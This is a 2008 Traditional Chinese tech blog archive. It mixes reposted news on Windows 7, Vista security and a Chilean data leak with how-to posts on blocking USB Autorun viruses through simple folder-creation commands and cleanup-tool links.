2008年5月30日 星期五

Vista賣不好 Windows7明年上市

一則來自自由時報的新聞~

在此與大家分享~

意外的是...沒想到這麼快就推出新版本了...

VISTA搞了那麼多年...

最終是個失敗品...

----------------------------------------------


〔記者陳英傑台北報導〕微軟Windows Vista作業系統從去年年初面世至今,遲未站穩腳步,下一代作業系統Windows 7,已經準備在二○○九年面世取代Vista,最大賣點就是採用「多點觸碰技術」,有可能使滑鼠及鍵盤退出市場。


微軟董事長比爾蓋茲曾表示,微軟投資手寫辨識及語音技術已有十多年,使用者已經可以接受與電腦互動的新方式,他認為觸碰技術很快就會成為市場主流。


微軟先前已暗示,Windows 7會採用類似Apple iPhone的多點觸碰技術,也就是說五隻手指頭在螢幕上就可以畫出五條線,也可直接使用手指頭編輯照片,拉大或縮小照片,也能拖拉電子地圖及尋找景點用。


過去微軟高層曾表示,Vista上市三年後,預計二○一○年才會推出下一代的Windows作業系統,不過Vista積弱不振,Windows 7可能明年提前推出。對新作業系統信心滿滿的微軟認為,觸碰螢幕來操作圖片、地圖技術,可能會讓電腦族少用鍵盤及滑鼠,甚至使得滑鼠及鍵盤退出市場。


不過PChome網路家庭雜誌採訪編輯唐詩哲指出,觸碰螢幕的確有其好用之處,但能否真的取代鍵盤及滑鼠,還是未知數。有了Vista的失敗教訓,建議微軟未來應該要更注重操作方便性,而非注重視覺效果。


電腦鍵盤及滑鼠廠商羅技電子則表示,對微軟Windows 7目前不方便發表意見。


網友怕手汗螢幕油膩


但有網友說,自己容易出手汗,Windows 7採用多點觸碰螢幕雖然很酷,但他擔心自己的電腦螢幕會因此油膩膩影響觸感。也有網友覺得,觸碰螢幕成本高、賣價也高,用手觸碰,除了有新鮮感,看不到什麼太大好處。

2008年5月29日 星期四

火拼微軟新注音 Yahoo!奇摩輸入法Beta上線

Yahoo!奇摩想要再次改變歷史!!向各大輸入法挑戰!!
Yahoo!奇摩推出了自家的輸入法.不但有Windows的版本(32位元.64位元都有).就連蘋果電腦用的版本都有

以下是一則來自於iThome online的新聞報導
在此分享給大家~

而Yahoo!奇摩輸入法下載網頁網址如下
http://tw.download.yahoo.com/keykey/

進去之後可以點選要下載的版本

不知道是因為剛推出太熱門還是怎樣
在本文章送出前為止本人都無法正常下載該檔案

或許過幾天再去用用看吧~

----------------------------------------------------

Yahoo!奇摩如此自信滿滿的原因,是由於在輸入法中整合了搜尋資料庫的詞彙,因此宣稱在智慧型字詞組合的功能上要比微軟更強大。


經歷半年開發過程,Yahoo!奇摩在今天(5/29)正式發表「Yahoo!奇摩輸入法」Beta版,要和微軟推出已久的新注音輸入法展開正面對決。

雖然桌面應用並非網路大廠Yahoo!奇摩的強項,不過該公司對自身的輸入法相當有信心。Yahoo!奇摩社群暨通訊服務資深經理林志強表示,絕不輸微軟,甚至會比新注音更好用。

Yahoo!奇摩如此自信滿滿的原因,是由於在輸入法中整合了搜尋資料庫的詞彙,因此宣稱在智慧型字詞組合的功能上要比微軟更強大。林志強指出,注音輸入法最重要的就是貼近使用者習慣,因此和搜尋資料庫結合,許多人搜尋的詞彙就會被歸入詞庫,如此一來更可貼近流行、時事。往後還會陸續有新版推出,也會不定期連回後端更新字詞資料庫。

雖然輸入法為桌面端應用,不過Yahoo!奇摩充分結合其搜尋事業的資源,除了靠搜尋加強聰明選字資料庫外,也可直接在輸入時進行網頁、股市搜尋,包括英漢、漢英字典查詢。除此之外,也有人工智慧記憶功能,如果使用者常用的詞彙不在資料庫中,在輸入幾次後就會自動被記憶。

選擇自行開發輸入法的原因,Yahoo!奇摩社群暨通訊服務事業部總監鄭雅仁表示:「輸入法是所有使用者使用電腦的起點。」而這也符合Yahoo!奇摩今年要成為使用者「Starting Point」的期許,加上Yahoo!奇摩認為輸入法數十年如一日,因此現在結合自家搜尋資源,要開發出比新注音更好用的輸入法。

鄭雅仁坦承:「桌面應用不是我們的強項,因此會選擇需求大的應用和外部資源進行合作,但不可能什麼都做。」此次開發輸入法的構想雖是在去年Yahoo!奇摩內部的創新開發日(Hack-day)中產生,不過實際的開發則是和外部開放源碼社群合作,運用開放資源打造。

因此輸入法並非Yahoo!奇摩自行開發,而是以Yahoo!奇摩本身的構想和開放源碼社群進行合作,並採用開放源碼中最寬鬆的BSD授權。不過林志強表示,並不會將輸入法的原始碼開放出來,「是考慮到安全性問題」他說,如果將原始碼開放、允許修改,就很容易被有心人士利用。

從推出輸入法的作法來看,Yahoo!奇摩並不排除進行網路應用以外的開發,不過現階段先以和外部廠商合作的模式為主。鄭雅仁就說:「只要有合適的想法,就會向外部尋求合作。」對於是否會獨立出部門進行桌面應用的研發,他僅語帶保留表示,並不排除這個可能。

另外在推廣的部份,雖然目前尚未和電腦廠商談預載合作,不過林志強說:「歡迎硬體廠商找我們談。」而台灣微軟目前則不願對此事做出評論。

報導:微軟Windows 7將用Vista核心

一則來自iThome online的新聞報導~

分享給大家~~

----------------------------------------------

Windows 7將以Vista核心為基礎,而且將適用相容於Vista的應用程式及硬體。

微軟對新一代作業系統Widnows 7資訊保密到家,不過Windows暨Windows Live技術副總裁Steven Sinofsky在近日接受CNET專訪時透露了Widnwos 7預計在2010年初問世,同時也指出Windows 7將以Vista核心為基礎,而且將適用相容於Vista的應用程式及硬體。

微軟視窗客戶溝通總監Chris Flores在部落格中說明了微軟對Widnwos 7守口如瓶的原因,指出微軟知道若談及新一代作業系統計畫將大幅影響合作伙伴或客戶行為,因此在與客戶分享Widnows 7資訊時更為謹慎,現階段微軟僅與建置視窗軟體及硬體的合作業者私下分享相關資訊,要到產品更為完整時才會釋出更多的訊息。

自從Vista出爐後,業界浮散著不滿Vista的聲浪,科技媒體InfoWorld發起拯救XP活動,希望微軟延後今年6月終止XP銷售的期限,另有企業打算跳過Vista,直接昇級到新一代視窗作業系統Windows 7。

Steven Sinofsky公開透露Windows 7的資訊,引發了外界對Windows 7的疑慮,因為原本外界認為Windows 7將會採用新的核心,是一有大幅更新的主要作業系統版本。

對此,Chris Flores指出,Windows 7的確是一主要作業系統版本,微軟在Vista、Vista SP1及Windows Server 2008所進行的長期以來的架構投資將會延續到Windows 7上;他強調Vista建立在非常堅固的基礎上,特別是諸如圖像、音訊及儲存等子系統,不論是Windows Server 2008或是Windows 7都將建立在同一基礎上,並進一步修改Vista的核心架構及元件模型,並非外界所猜測的在Windows 7上採用新核心。

Chris Flores說,Windows 7其中一個主要設計目標就是讓它能在微軟建議的Vista硬體規格上執行,讓所有相容於Vista的軟體及硬體都能相容於Vista。

在說明Windows 7時,Chris Flores也不忘宣傳Vista,表示Vista SP1不論在裝置或應用程式相容性、可靠性、效能、電池壽命或安全上皆有改善;此外,截至今年3月,微軟總計售出逾1.4億的Vista授權,同時分析師預測指出企業採用Vista的時程約與XP一致,認為Vista的銷售量證明了企業的持續採用。

Sinofsky及Flores提及的是Windows 7的核心架構,而微軟董事長Bill Gates及執行長Steve Ballmer則預計在周二晚間的D:All Things Digital會議上展示Windows 7的使用者介面,其中一個功能為類似iPhone的多重觸控(Multi Touch)設計。(編譯/陳曉莉)

2008年5月27日 星期二

Yahoo 奇摩 知識+ "知識團"

Yahoo! 奇摩 在 知識+ 推出的新功能:

知識團~~~~~~~~~~~~

無非就是要騙更多人去幫別人回答問題

讓Yahoo 奇摩 知識+ 有更多用戶~~~~

我也去辦了一個知識團~~~~~~~~~~~

希望有興趣的人可以一起加入唷!!!!

http://tw.group.knowledge.yahoo.com/hello-studio

話說我這禮拜等級變成研究生2級了

怎麼感覺還蠻快的~~

大家快來加入吧!!!!!

甚麼是"HTML"

HTML------超文件標示語言
全名HyperText Markup Language,簡稱為HTML
是為網頁創建和其它可在網頁瀏覽器中看到的信息設計的一種置標語言。

1982 年,Tim Berners-Lee 為使世界各地的物理學家能夠方便的進行合作研究,建立了使用於其系統的 HTML。Tim Berners-Lee 設計的 HTML 以純文字格式為基礎,可以任何文字編輯器處理,最初僅有少量標記(TAG)而易於掌握運用。隨著 HTML 使用率的增加,人們不滿足只能看到文字。1993 年,還是大學生的 Marc Andreessen 在他的 Mosaic 瀏覽器加入 標記,從此可以在 Web 頁面上瀏覽圖片。但人們認為僅有圖片還是不夠,希望可將任何形式的媒體加到網頁上。因此 HTML 不斷地擴充和發展。

HTML被用來結構化信息——例如標題、段落和列表等等,也可用來在一定程度上描述文檔的外觀和語義。由蒂姆·伯納斯-李給出原始定義,由IETF用簡化的SGML(標準通用置標語言)語法進行進一步發展的HTML後來成為國際標準,由全球資訊網聯盟(W3C)維護。

包含HTML內容的文件最常用的擴展名是.html,但是像DOS這樣的舊作業系統限制擴展名為最多3個字元,所以.htm擴展名也被使用。雖然現在使用的比較少一些了,但是.htm擴展名仍舊普遍被支持。編者可以用任何文本編輯器或所見即所得的HTML編輯器來編輯HTML文件。

早期的HTML語法被定義成較鬆散的規則以有助於不熟悉網路出版的人採用。網頁瀏覽器接受了這個現實,並且可以顯示語法不嚴格的網頁。

隨著時間的流逝,官方標準漸漸趨於嚴格的語法,但是瀏覽器繼續顯示一些遠稱不上合乎標準的HTML。使用XML的嚴格規則的XHTML(可擴展超文件標示語言)是W3C計劃中的HTML的接替者。雖然很多人認為它已經成為當前的HTML標準,但是它實際上是一個獨立的、和HTML平行發展的標準。
W3C目前的建議是使用XHTML 1.1、 XHTML 1.0或者HTML 4.01進行網路出版。





2008年5月26日 星期一

還在用盜版軟體嗎?2008軟體反盜版活動開跑,小心下一個被抓的就是你




也許標題下的太過聳動

一般查緝盜版均是以公司行號學校團體作為單位

很少在查緝"個人"的軟體版權問題

但在不久的將來也許"個人"也有可能是查緝的對象

以下是一則來自中央社的報導

為鼓勵使用正版軟體

其實網路上有許多的免費軟體

功能甚至比付費的更強大更好用

本站也將陸續推出一些免費,正版軟體的介紹

敬請期待!!

-----------------------
(中央社記者何宏儒台北二十六日電)

台灣軟體盜版問題有待改善;據官方統計,自去年1月至今年3月,已有41位企業主因公司使用盜版軟體遭檢警查緝,侵權金額近12億元,平均每11天就有1位企業主遭查緝。另據台灣商業軟體聯盟(BSA)調查,43%企業員工,曾於公司電腦下載或灌裝盜版軟體,致企業用戶面臨法律風險。
  為宣導正確軟體使用觀念,BSA今天宣布,自6月1日起展開軟體反盜版行動;除配合檢警進行企業內部使用盜版軟體查緝,今年更推出「企業軟體管理認證活動」,盼導正軟體使用觀念,由「消極避免盜版」轉變為「積極管理軟體資產」。
  BSA共同主席宋紅媞表示,台灣智慧財產權的保護觀念雖已明顯提升,但企業軟體授權套數不足問題仍相當嚴重。據保二總隊保護智慧財產權警察大隊統計,去年1月至今年3月間,已有41位企業主因公司使用盜版軟體遭檢警查緝,侵權金額達近12億元,平均每11天即有1位企業主因盜版行為遭查緝。
  另外,BSA於2007年11月調查逾6萬名企業員工的軟體使用行為,發現曾在公司電腦下載盜版軟體,或本身曾攜帶大補帖至公司灌裝的員工比例高達43%;即近半員工曾有使用盜版軟體的觸法行為,為企業帶來高度法律風險!
  為宣導正確軟體使用的重要性,BSA將自6月1日起展開軟體反盜版行動,除配合檢警調單位進行企業內部使用盜版軟體查緝,目前亦透過電視廣告與電腦經銷通路,密集宣導智慧財產權保護;其同時推出「企業軟體管理認證活動」,盼將企業的軟體使用觀念,由「消極避免盜版」轉化為「積極管理軟體資產」。
  BSA指出,企業可透過3步驟建立軟體管理制度,即瞭解公司軟體資產管理政策、稽核清查所有電腦、制定策略及程序以確保軟體查核工作長期進行;完成3步驟後,企業可將完整文件寄至BSA,經審核認可,即獲效期1年的「企業對軟體資產管理認證」,BSA將不主動對該公司進行軟體侵權之法律訴訟與查緝行動。
  有關詳細活動內容,有興趣者可透過活動熱線(02)2364-0034詢問,或至活動網站http://www.bsa2008.com.tw/check查詢。

變色文字

一個簡單的語法

我以前在網站建置百寶箱發布的教學

在此分享給大家


請到原網址複製語法

(在這邊貼會直接被執行.無法顯示完整語法)

原文網址如下
http://dob.tnc.edu.tw/themes/old/showPage.php?s=3640&t=6


點選此網址可以觀看範例
http://dob.tnc.edu.tw/demo.php?s=3640&authorSerial=1231&demoStyle=&setDemoInFrame=

若有任何意見歡迎提供~



近期公告

近期新增網頁語法教學

提供網友更多元化的資訊

部落格版面配置也進行了改版

另外哈囉工具包因為改良垃圾清理功能關係

所以可能必須延後推出新版本

而新增功能-流氓插件.IE工具疫苗 隨身碟Autorun病毒疫苗 等功能均已完成

目前正在努力強化其他舊有功能

預計6月中推出0.7BETA

請各位網友多多支持!!!

偵測 使用者瀏覽器所支援到的JavaScript版本

JavaScript可說是網頁語言中最廣泛被使用的一種語言

但有些效果必需要較新的版本才能支援

較舊的版本是不能支援的

這是我以前在網站建置百寶箱所發表的教學

在此分享給大家

若未來有更新的版本

網友也可以參考原本的語法做出修改以便支援新版本偵測


原文網址
http://dob.tnc.edu.tw/themes/old/showPage.php?s=3550&t=6

請從原網址複製語法

(因為直接打出來會被網頁執行.無法顯示完整語法)

2008年5月23日 星期五

防範隨身碟病毒系列(一)

之前有稍微簡單的介紹的隨身碟病毒


這裡交大家幾個簡單的方法來避免被該類病毒危害


該類病毒主要是透過網路與隨身儲存裝置進行散播


今天就從隨身碟的部分談起


由於該類病毒在網路上有許多的更新伺服器


防不慎防


所以在此建議大家建立所謂的"免疫"資料


所謂的免疫


不是完全避免病毒寫入你的磁碟


因為它們實在是變種太快了.防不慎防


我們所做的疫苗


是要讓他不會被電腦自動執行


由於AUTORUN記載了開啟資訊


所以你打開隨身碟時系統會去讀取資料


病毒就是藉由這個方法讓你在神不知鬼不覺的情況下中毒


這時候若是我們能"免疫"Autorun.inf這個部份的話


就算你隨身碟裡面再多病毒也不怕她會自己打開


(而該類病毒多會隱藏本身檔案.所以你也看不到.不會不小心打開)


如此一來就可以避免中毒.避免擴散


而我們要如何建立"免疫資訊"呢!?


我個人常用的方法是使用"命令提示字元".也就是XP底下的DOS


到要免疫的目錄底下例如X:\


輸入命令MD autorun.inf..


然後進入該資料夾在建立一個無效目錄

cd autorun.inf

md antivir

這樣就結束了

很簡單的一個方法

而且你也不能手動去刪除他

會出現錯誤訊息

如果覺得多一個資料夾很礙眼的話可以用 Attrib +h autorun.inf命令將之隱藏

如此一來就看不出來了

不過在此要介紹一個簡單又好用的方法

由對岸的公司所推出的U碟病毒免疫器

也就是隨身碟病毒免疫的意思.對岸習慣叫他U碟


本工具可對選定磁碟進行特別的免疫處理,

使得它的自動執行功能完全失效,

從而避免帶毒的移動磁碟插入本機後病毒立即自動執行。

本工具還具備修復系統磁碟關聯和取消系統自動運行特性,

徹底解決某些殺毒軟件在殺除病毒後無法打開磁碟的症狀。

註:如果不選擇任何磁碟,將執行附加功能,即修復磁碟關聯和取消系統自動運行特性。



由於該軟體是簡體中文的介面

在此提供已經由網友繁體中文化的版本

使用起來更為人性化.更好用!!!

方便建立免疫功能

也可以乾脆把自動執行功能關掉

連免疫都不必了


大家用用看吧~

下載網址:

http://freeware002.myweb.hinet.net/antiautorun_1.5_azo.7z



2008年5月22日 星期四

淺談隨身碟病毒(Autorun.KAVO)

隨身碟病毒是近年來感染範圍最廣而且"效率"最高的病毒之一

一個公司企業或是學校團體之中的一台電腦中毒之後

接下來幾乎都是開始大量中毒

這類隨身碟病毒早期都稱為Autorun病毒

現在大家大多叫他"KAVO"

但是這類病毒並非都為"KAVO"病毒

KAVO主要是產生檔名為KAVO的病毒

而其變種有TAVO.TASO.KASO等...

都屬於都屬於會藉由隨身碟Autorun自動執行的病毒類型

但是Autorun病毒不等於KAVO病毒

Autorun病毒種類有很多

而其變種速度也甚快

目前"沒有"100%可以遏止或消滅的方法

比較安全的方法是建立Autorun.inf唯讀無效檔案作為疫苗

避免被病毒寫入造成大量感染

這個方法可有效避免病毒擴散

就算你的磁碟寫入了病毒檔案

沒有的Autorun.inf資訊使他偷偷開啟

病毒也是沒有攻擊的能力

只是在你磁碟裡多佔了一點空間而已.並無大礙


而到底甚麼是"Autorun.inf"?

其實Autorun.inf只是用來記錄並且使裝置達到"自動執行"效果的一個資訊

他只是一個簡單的純文字檔案.用記事本或其他同類程式即可開啟編輯

用Autorun.inf可以達到"自動執行"病毒的功能

Autorun自動執行功能早期應用在唯讀光碟中

隨身碟並不支援光碟所用的Autorun.雖然它們是同樣的東西

最大的差異是光碟的Autorun是放入光碟後可以不經任何動作自動開啟

而隨身碟的Autorun卻不會這麼自動的執行

他需要靠使用者"開啟"隨身碟才會跟著執行

也有業者推出了讓隨身碟有光碟Autorun功能的軟體

但前提是電腦上都必須先安裝該軟體才能使用該功能

實際上使用的人並不多


Autorun病毒最有名的案例便是2006年起"李俊"的"熊貓燒香"

從2006年年底開始流竄一直到2007年大量肆虐網路

不但可透過網路感染他人

更可以透過可攜式媒體自我複製.也就是"所有"可以直接寫入儲存資料的地方(光碟就不行了)

包括了隨身碟.硬碟.手機.相機.隨身聽等...

這也就是為什麼我常常看朋友的隨身聽或手機甚至是相機可以清楚的告訴他"你家電腦中毒了"的原因了

我經常發現同學朋友電腦中毒並非透過他們的電腦而是其他電子產品

而我都會把專用的偵測以及解讀成是給它們帶回家用

事實上也證明了確實它們的電腦是中毒的.我沒有虎爛他們

這也說明了此類病毒的可怕...感染能力之強前所未見...

正礙於Autorun的運作原理.Autorun本身不是病毒

他只是一個系統會去讀取的資訊

而可怕的地方在於他會去讓系統打開"病毒"

這與這功能本來的目的是不一樣的.卻是相同的手段

原先Autorun是為了方便.如今卻是病毒感染的最強途徑

防毒軟體無法從Autorun之中判斷是否有病毒

防毒軟體更不會去讀取.判斷Autorun中的指令後去掃描被呼叫執行的檔案

加上該類病毒都繪上網"更新"新版的變種,使他更是難以預防...

光靠防毒.防間諜.防木馬程式根本是沒用的

網路上討論的如火如荼...卻也只是幾種比較常見的

我個人發現位在網路上被討論的該類病毒就有將近十種之多

我還特地用一個獨立硬碟灌系統做病毒測試平台去觀察他們的危害

日前最常見的就是無法開啟磁碟

有些是出現錯誤.有些是出現選用程式開啟...等等等的

而其他如造成執行檔無法執行.某些特定檔案被刪除.無法顯示隱藏檔.系統功能無法正常運作...等

它們的症狀已經有數十種之多...相信不久的將來可能變為數百種數千種之多


檔案格式也不再只侷限於EXE執行檔

其他如COM執行檔BAT.CMD批次檔格式的該類病毒最近也越來越常見




目前網路上幾個有名的清除該類病毒程式主要有Efix.Kavo Killer.SafeUSB等等

但是主要都是透過檔名進行辨識沒有辦法徹底正確判斷檔案

若是有安全檔案同名或是未來病毒變種為其他常用到的重要檔案名稱

若又使用該類病毒清除軟體.那後果不堪設想...

但由於該類病毒的幾個特徵

其實一般使用者也可以由簡單的方法辨識

一般來說COM這種執行檔是很少人在使用的

其他像是檔名很奇怪.無意義的EXE執行檔甚至是BAT.CMD批次檔

這種一般使用者不會去使用到的幾個格式檔案都很有可能是病毒的化身

這時候就要多加留意以免受害

目前已知的危害有如竄改系統設定.刪除特定類型檔案.造成電腦不穩定

而比較嚴重的應該是盜用使用者個人資料

其造成的損失大多難以用金錢估計

所以使用者務必小心防範以免受害

在此提供幾個清除軟體連結供下載

請存放在你的隨身碟或記憶卡中

到別人家電腦傳輸資料時務必掃毒

掃毒花的時間不多.過程也都很簡易

為了個人資料的安全請務必特別小心

使用隨身碟.MP3.手機.相機.記憶卡傳輸資料時先執行掃描

多一分小心.多一分安全!!


EFIX 

由PPT批批踢網友製作

下載網址:

http://playmypc.blogspot.com/2008/07/efix-469.html

Wow! USB Protector 

另一套由網友研發的掃毒工具

下載網址:

http://playmypc.blogspot.com/2008/11/wow-usb-protector-viruskiller-073.html

以上兩套是本人用過覺得還算不錯的清毒工具

當然網路上還有許多網友或是電腦工作室製作了一些工具.小程式或是批次檔

同樣有類似.大同小異的功能

在此就不一一列出了

請見諒

希望經過這篇文章後各位網友有稍微了解到近年流行的隨身碟病毒

也了解到病毒的可怕

而防毒軟體也不是萬能的

在使用上也要有良好的習慣

配合一套好的防毒軟體

才能擁有乾淨的使用環境!!



2008年5月21日 星期三

Vista 比 Win2000 還不安全!?

以下是兩篇這個月的新聞

可供想升級Vista的網友參考看看

對於Vista與2000安全性的比較

不過我個人倒是蠻想知道XP在它們之中的定位

或許比2000&Vista都更不安全吧!?

至少它是全世界目前使用這最多最主流的作業系統

應該也會是頭號的攻擊目標...

安全性自然頗有堪慮...

--------------------------------------------------------------

安全業者:Vista沒比Windows 2000安全
文/陳曉莉 (編譯) 2008-05-12


PC Tools表示,去年下半年該公司ThreatFire社群140萬台個人電腦所回報的資料顯示,每一千Vista電腦上出現639個不重覆安全威脅,Windows 2000電腦則僅出現586個。



對於微軟不斷強調最新作業系統Windows Vista的安全性,在一份由資安業者PC Tools的調查報告中卻指出,Vista比8年前的Windows 2000還容易受到攻擊。

PC Tools執行長Simon Clausen表示,雖然微軟宣稱Vista是有史以來最安全的作業系統,但根據去年下半年由該公司ThreatFire社群140萬台個人電腦所回報的資料顯示,平均每一千台安裝Vista作業系統的電腦上出現639個不重覆安全威脅,在Windows 2000電腦上則僅出現586個,在Windows 2003上有478個,在XP上則有1021個。

最近微軟曾宣稱在安全性上,Vista比前一代的XP提昇了60%,但此次PC Tools所提供的數據則顯示Vista在安全性上只比XP好上37%。

不過,PC Tools強調,即使Vista比XP安全,但該調查透露出Vista尚未安全到足以讓使用者放棄其他資安軟體。

這也許是雙方所採用的安全性評估方法不同,再者,PC Tools亦未說明相關漏洞的位置或其嚴重性,因此有可能是瀏覽器而非作業系統漏洞。

InformationWeek報導微軟對此一調查的回應指出,ThreatFire與微軟惡意軟體移除工具(MSRT)所偵測到的結果並不一致,去年下半年,MSRT發現有2.8%執行Vista的電腦上有惡意程式,但在XP SP2平台上則佔7.2%,在Windows 2000 SP4上有5%,在Windows 2000 SP3上有12.2%。ThreatFire為PC Tools所開發的防毒軟體,採用的是行為偵測技術。(編譯/陳曉莉)

--------------------------------------------------------------

微軟:Vista比Windows 2000還要安全
文/陳曉莉 (編譯) 2008-05-14


微軟指出,MSRT在執行Vista的機器上所發現並清除的惡意程式比XP SP2少了60.5%,而與Windows 2000相較,在Vista上發現的惡意程式比Windows 2000 SP4少了44%,也比Windows 2000 SP3少了77%。



資安業者PC Tools近日釋出一份報告指稱,Vista比8年前的Windows 2000還容易受到惡意程式攻擊,而微軟客戶端安全產品管理總監Austin Wilson則旋即在部落格中說明了微軟對惡意程式的研究方式以駁斥此項說法。

Austin Wilson指出,微軟非常謹慎地研究惡意軟體,並在每年發表兩次的安全智慧報告(Security Intelligence Report)公布研究結果。該報告集結了每個月全球逾4.5億台執行微軟惡意程式移除工具(Malicious Software Removal Tool,MSRT)所回報的結果,同時,微軟也是反惡意軟體測試標準組織AMTSO的成員,採用其核准的測試方法。

根據微軟在今年4月所公布的安全智慧報告,該報告調查的是去年6月到12月的惡意程式感染狀況,發現MSRT在執行Vista的機器上所發現並清除的惡意程式比XP SP2少了60.5%,而與Windows 2000相較,在Vista上發現的惡意程式比Windows 2000 SP4少了44%,也比Windows 2000 SP3少了77%,其所調查的Windows 2000涵蓋個人電腦及伺服器版本,而且由於許多伺服器版本都被用在資料中心上,而非用來瀏覽網路因此被惡意程式人侵的比例較低。這意味著一般用戶使用的Windows 2000受到惡意程式感染的比例高於上述數字。

Austin Wilson強調,Vista中有許多Windows 2000缺乏的安全功能,涵蓋DEP、ASLR、預設啟動的防火牆、Windows Defender、強化的IE安全性、使用者帳戶控管(UAC)、Windows Security Center等。

此外,Austin Wilson亦澄清這並非意味著Vista不需要防毒軟體,因為沒有軟體是完美的,即使微軟大幅度改善了Vista的安全性,但消費者仍需遵循保護電腦的指導原則,包括啟動防火牆功能、維持最新的作業系統版本,以及最新的防毒與反間諜軟體等。

PC Tools是透過旗下ThreatFire社群140萬台個人電腦所回報的資料,指出平均每一千台安裝Vista作業系統的電腦上出現639筆不重覆安全威脅,在Windows 2000電腦上則僅出現586筆,在Windows 2003上有478筆,在XP上則有1021筆,因而認定Vista不如Windows 2000安全,該報告蒐集資料的時期亦為去年下半年。(編譯/陳曉莉)


--------------------------------------------------------------

2008年5月19日 星期一

我的Yahoo! 奇摩 知識+






話說我的Yahoo! 奇摩 知識+是在剛推出時就有參與過這個服務





一開始其實也不清楚這個服務是做甚麼的





後來有收到Yahoo的來信所以就近去看看了





其實Yahoo! 奇摩 知識+所包含的知識水準並不高





也有許多的知識並非是正確的





人人皆可回答





甚至有人把這個拿來作為廣告的工具





這幾天個人突然又有點常去逛逛





偶爾就順便回答一下問題





這是我的知識檔案





大家有空近來看看吧!!

有甚麼意見也可以交流一下~




http://tw.knowledge.yahoo.com/my/my?show=AA00003981





PS:


我現在是研究生 3 級~

有空的話會盡量上去幫大家解答問題

有問題在上面發問可以告訴我










2008年5月17日 星期六

近期公告

近期由於更新哈囉工具包7.0版本工程浩大

改進舊版功能˙增加新功能˙修正BUG等等的

新功能這次花了很多時間一直在改

不斷把相關的功能做到最好

(我不希望是功能先有,至於功能是否完善等未來改進)

所以也花了很多的時間

另外也在找適合的論壇空間

速度,穩定性,功能等都是挑選的重點

一直沒有找到適合的地方

還在持續尋找中


這段時間部落格更新次數會減少

所以大家可能比較沒有新文章可以看

不過可以多翻翻舊的文章

有些舊的內容也蠻不錯的

有什麼建議也歡迎提供給我

謝謝

2008年5月16日 星期五

郵局的中文地址英譯.不怕地址有問題

大家多多少少都有在國外網站購買東西

或是有別人要從國外寄東西給你的經驗吧!?

在國外總部能寫中文地址吧...誰看的懂...

(以後一定的懂...不過是簡體的...)

中華郵政(台灣郵政)就提供了這麼一個便民服務

大家可以把自己的地址輸進來進行最"官方"的翻譯

這樣一台就不用怕東西寄不到家囉~

網址如下

大家來用用看吧~

http://www.post.gov.tw/post/internet/f_searchzone/index.jsp?ID=190103

2008年5月15日 星期四

3+2 郵遞區號查詢

記得很久很久以前我們的郵遞區號是五位數的

不過後來變成只有前面三位

這幾年又改回五位數了

不知道是否可以增加寄信的傳送效率

郵局好像有送一個郵遞區號的磁鐵

不知大家是否有收到!?

沒收到或弄丟了沒關係

這裡中華郵政(台灣郵政)提供了這麼一個便民服務

依據你的所在地幫你查出妳的郵遞區號

快來試試看吧!!!

http://www.post.gov.tw/post/internet/f_searchzone/index.jsp?ID=190102

2008年5月14日 星期三

複製.移動檔案的大絕招





當你在Windows底下複製或是移動檔案時

當目的地資料夾出現名稱相同的檔案時

通常會跳出一個對話框框問你使否取代

而選項都只有 "是" , "全部取代" , "否" , "取消"

而這時後如果要"全部皆否"怎麼辦呢??

答案很簡單~~

你只要按住鍵盤上的 [ Shift ] 不放在按下"否"

這樣子之後只要有相同檔名的檔案系統就會自動跳過囉~~

是不是很方便呢!?

小技巧~學起來吧!!

PS:只有一次複製兩個或兩個以上的檔案

並且出現檔名重複的狀況才會有以上那種對話框

否則只會有 "是 " & " 否 " 可以選~~

新興Web線上遊戲---英雄無敵Online






無意中在本站廣告欄位發現的遊戲

免費暢玩~不用安裝~

雖然功能不多

而且跟一般線上遊戲比起來算是簡陋

不過以WEB遊戲來說已經不錯了

大家有興趣的建議可以去玩玩看~

今天剛玩

才L1等而已~

正在摸索遊戲中~

如果有什麼祕技在來跟大家分享~

大家一起來玩玩吧!!!!

(多按幾次重新整理就會在廣告欄看到囉~)

(記得多幫本站點越廣告啊!!!!)

2008年5月12日 星期一

智利電腦駭客盜走六百萬個資po上部落格

一則來自中廣的新聞

看到這新聞就熱我想到終極警探4.0裡面的情結

裡面的駭客也是功力高超

而最初的目的也只是為了希望國家能注意到這方面的安全問題

不過國家不但不當一回事還毀了當事人

於是一場報復行動就展開了....

好啦~不是要談電影~大家看看新聞吧...

--------------------------------------

智利一名電腦駭客從政府及軍方的伺服器中,盜走六百萬人的機密資料,

隨後將全部個資貼在一個科技論壇的部落格上。

這些資料包括個人的身分證號碼、住址、電話號碼及學歷背景等。

駭客還留話說,他這麼做的目的在於突顯智利當局對於機密資料的保護有多麼鬆懈、疏失。


這些資料被po上部落格之後,沒多久有關當局就發現,

隨即採取行動,刪除並報警。警方也已經展開調查。

--------------------------------------

同樣的一則報導

來自法新社
--------------------------------------
(法新社聖地牙哥十一日電)智利「水星日報」今天說,

一名駭客闖進智利政府網站,竊取六百萬人的資料後,

將資料張貼在兩個人氣網站上長達數小時。

這些昨天到今天清晨,

從教育部、電子服務處、國營電話公司網站竊取的個人資料,

包括姓名、住址、電子郵件地址、電話號碼、社會與教育背景。

警方網路犯罪科長賈拉告訴水星日報:「事態嚴重,我們正在調查。」

這些數據在當局從科技資訊網站「FayerWayer」與社群網站「ElAntro」移除之前,

張貼在網上數個小時。

這名駭客在這兩個網站上說,

他散佈這些資料是

「要讓全世界看到...個人資料在智利有多麼不受保護...沒有人想費心保護那些資訊」。
--------------------------------------

2008年5月11日 星期日

ASUS EPU是天大謊言?-技嘉指控華碩EPU主機板造假!

從Tom's 硬體得到的資訊

與大家分享


目前華碩、技嘉都針對P35、X38、X48主機板分別推出EPU以及Dynamic Energy Saver省電節能技術,先前我們也曾藉著技嘉EP35-DS3R、X48T-DQ6主機板做過相關報導(技嘉首款動態節能主機板-EP35-DS3R讓P35更省電-技嘉EP35-DS3R搭載DES動態節能技術技嘉X48旗艦版提前亮相-X48T-DQ6),理論上,技嘉DES技術支援處理器電源能夠多段相位變化,明顯地超越ASUS的EPU僅能夠做2段式電源相位,那麼實際使用上是否真是如此?





技嘉科技技術行銷部經理-江望平先生詳細解說與測試兩家節省電技術差異



ASUS玩弄省電效率數據






由ASUS所公布技嘉DES的電源效率曲線是錯誤






使用DES技術下所測得正確的電源效率曲線


技嘉首先在簡報指出ASUS在技嘉公布DES電源效率數據後,自行更改自家的數字由58.6%至80.23%,由同樣硬體設計的P5E3 Deluxe、P5E3 Premium為例,竟然出現前後不同電源效率數字,再者以EPU僅支援2相電源變化來看,根本無法達到ASUS所宣稱的數據,而且ASUS所提出DES與EPU電源效率曲線,技嘉出示正確曲線。


測試平台
